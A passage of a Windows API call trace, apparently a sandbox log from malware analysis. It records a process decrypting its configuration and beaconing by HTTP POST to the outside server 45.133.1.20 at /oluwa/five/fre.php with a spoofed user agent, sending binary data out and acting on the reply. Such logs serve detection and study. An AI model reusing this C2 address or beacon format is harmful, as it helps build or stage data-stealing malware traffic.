dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0216.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.870] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0216.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0216.871] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0216.871] GetProcessHeap () returned 0x6a0000 [0216.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0216.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.872] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0216.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.875] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0216.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.876] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0216.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0216.877] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0216.877] GetProcessHeap () returned 0x6a0000 [0216.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0216.877] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0216.877] GetProcessHeap () returned 0x6a0000 [0216.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0216.877] socket (af=2, type=1, protocol=6) returned 0x628 [0216.878] connect (s=0x628, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0216.901] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0216.901] GetProcessHeap () returned 0x6a0000 [0216.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0216.901] GetProcessHeap () returned 0x6a0000 [0216.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0216.902] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0216.903] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0216.903] GetProcessHeap () returned 0x6a0000 [0216.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0216.903] GetProcessHeap () returned 0x6a0000 [0216.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0216.904] GetProcessHeap () returned 0x6a0000 [0216.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0216.904] GetProcessHeap () returned 0x6a0000 [0216.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0216.905] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0216.905] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0216.907] GetProcessHeap () returned 0x6a0000 [0216.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0216.907] GetProcessHeap () returned 0x6a0000 [0216.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0216.907] send (s=0x628, buf=0x6b5c98*, len=242, flags=0) returned 242 [0216.908] send (s=0x628, buf=0x6bb998*, len=159, flags=0) returned 159 [0216.908] GetProcessHeap () returned 0x6a0000 [0216.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 [0216.908] recv (in: s=0x628, buf=0x6c4f18, len=4048, flags=0 | out: buf=0x6c4f18*) returned 204 [0216.992] GetProcessHeap () returned 0x6a0000 [0216.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0216.992] GetProcessHeap () returned 0x6a0000 [0216.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0217.000] GetProcessHeap () returned 0x6a0000 [0217.001] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0217.001] GetProcessHeap () returned 0x6a0000 [0217.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0217.002] closesocket (s=0x628) returned 0 [0217.044] GetProcessHeap () returned 0x6a0000 [0217.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0217.044] GetProcessHeap () returned 0x6a0000 [0217.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0217.045] GetProcessHeap () returned 0x6a0000 [0217.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0217.045] GetProcessHeap () returned 0x6a0000 [0217.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0217.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xec4) returned 0x628 [0217.047] Sleep (dwMilliseconds=0xea60) [0217.051] GetProcessHeap () returned 0x6a0000 [0217.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0217.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.052] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.060] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0217.071] GetProcessHeap () returned 0x6a0000 [0217.071] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0217.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.079] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0217.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.080] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.084] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.084] GetProcessHeap () returned 0x6a0000 [0217.084] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0217.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.086] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0217.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.087] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0217.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.088] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0217.088] GetProcessHeap () returned 0x6a0000 [0217.088] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0217.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.090] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0217.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.091] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0217.092] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.092] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0217.096] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.096] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0217.097] GetProcessHeap () returned 0x6a0000 [0217.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0217.097] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0217.097] GetProcessHeap () returned 0x6a0000 [0217.097] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0217.098] GetProcessHeap () returned 0x6a0000 [0217.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0217.098] GetProcessHeap () returned 0x6a0000 [0217.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0217.099] GetProcessHeap () returned 0x6a0000 [0217.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0217.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.100] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.107] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0217.117] GetProcessHeap () returned 0x6a0000 [0217.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0217.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.118] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0217.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.119] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.121] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.121] GetProcessHeap () returned 0x6a0000 [0217.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0217.122] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.122] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0217.123] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.124] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0217.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.125] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0217.125] GetProcessHeap () returned 0x6a0000 [0217.125] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0217.128] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.128] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0217.129] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.130] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0217.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.131] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0217.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.132] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0217.132] GetProcessHeap () returned 0x6a0000 [0217.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0217.132] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0217.132] GetProcessHeap () returned 0x6a0000 [0217.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0217.132] socket (af=2, type=1, protocol=6) returned 0x62c [0217.133] connect (s=0x62c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0217.156] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0217.156] GetProcessHeap () returned 0x6a0000 [0217.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0217.156] GetProcessHeap () returned 0x6a0000 [0217.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d7f08 [0217.157] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0217.158] wvsprintfA (in: param_1=0x6d7f08, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0217.158] GetProcessHeap () returned 0x6a0000 [0217.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0217.158] GetProcessHeap () returned 0x6a0000 [0217.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0217.158] GetProcessHeap () returned 0x6a0000 [0217.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0217.160] GetProcessHeap () returned 0x6a0000 [0217.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d7f08 [0217.161] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0217.163] wvsprintfA (in: param_1=0x6d7f08, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0217.163] GetProcessHeap () returned 0x6a0000 [0217.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0217.163] GetProcessHeap () returned 0x6a0000 [0217.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d7f08 | out: hHeap=0x6a0000) returned 1 [0217.164] send (s=0x62c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0217.167] send (s=0x62c, buf=0x6bb998*, len=159, flags=0) returned 159 [0217.167] GetProcessHeap () returned 0x6a0000 [0217.167] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0217.167] recv (in: s=0x62c, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0217.280] GetProcessHeap () returned 0x6a0000 [0217.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0217.281] GetProcessHeap () returned 0x6a0000 [0217.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0217.282] GetProcessHeap () returned 0x6a0000 [0217.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0217.282] GetProcessHeap () returned 0x6a0000 [0217.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0217.283] closesocket (s=0x62c) returned 0 [0217.284] GetProcessHeap () returned 0x6a0000 [0217.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0217.284] GetProcessHeap () returned 0x6a0000 [0217.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0217.285] GetProcessHeap () returned 0x6a0000 [0217.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0217.285] GetProcessHeap () returned 0x6a0000 [0217.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0217.288] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xdec) returned 0x62c [0217.290] Sleep (dwMilliseconds=0xea60) [0217.292] GetProcessHeap () returned 0x6a0000 [0217.292] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0217.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.293] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.306] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0217.330] GetProcessHeap () returned 0x6a0000 [0217.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0217.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.331] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0217.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.332] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.339] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.340] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.340] GetProcessHeap () returned 0x6a0000 [0217.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0217.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.341] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0217.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.342] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0217.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.343] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0217.343] GetProcessHeap () returned 0x6a0000 [0217.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0217.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.344] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0217.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.346] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0217.347] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.347] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0217.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.348] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0217.350] GetProcessHeap () returned 0x6a0000 [0217.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0217.350] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0217.351] GetProcessHeap () returned 0x6a0000 [0217.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0217.351] GetProcessHeap () returned 0x6a0000 [0217.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0217.352] GetProcessHeap () returned 0x6a0000 [0217.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0217.353] GetProcessHeap () returned 0x6a0000 [0217.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0217.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.354] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0217.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.360] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0217.366] GetProcessHeap () returned 0x6a0000 [0217.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0217.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.367] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0217.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.368] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0217.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.369] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0217.370] GetProcessHeap () returned 0x6a0000 [0217.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0217.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.373] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0217.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.374] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0217.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0217.375] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0217.375] GetProcessHeap () returned 0x6a0000 [0217.376] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0217.376] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.377] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0217.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0217.380] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 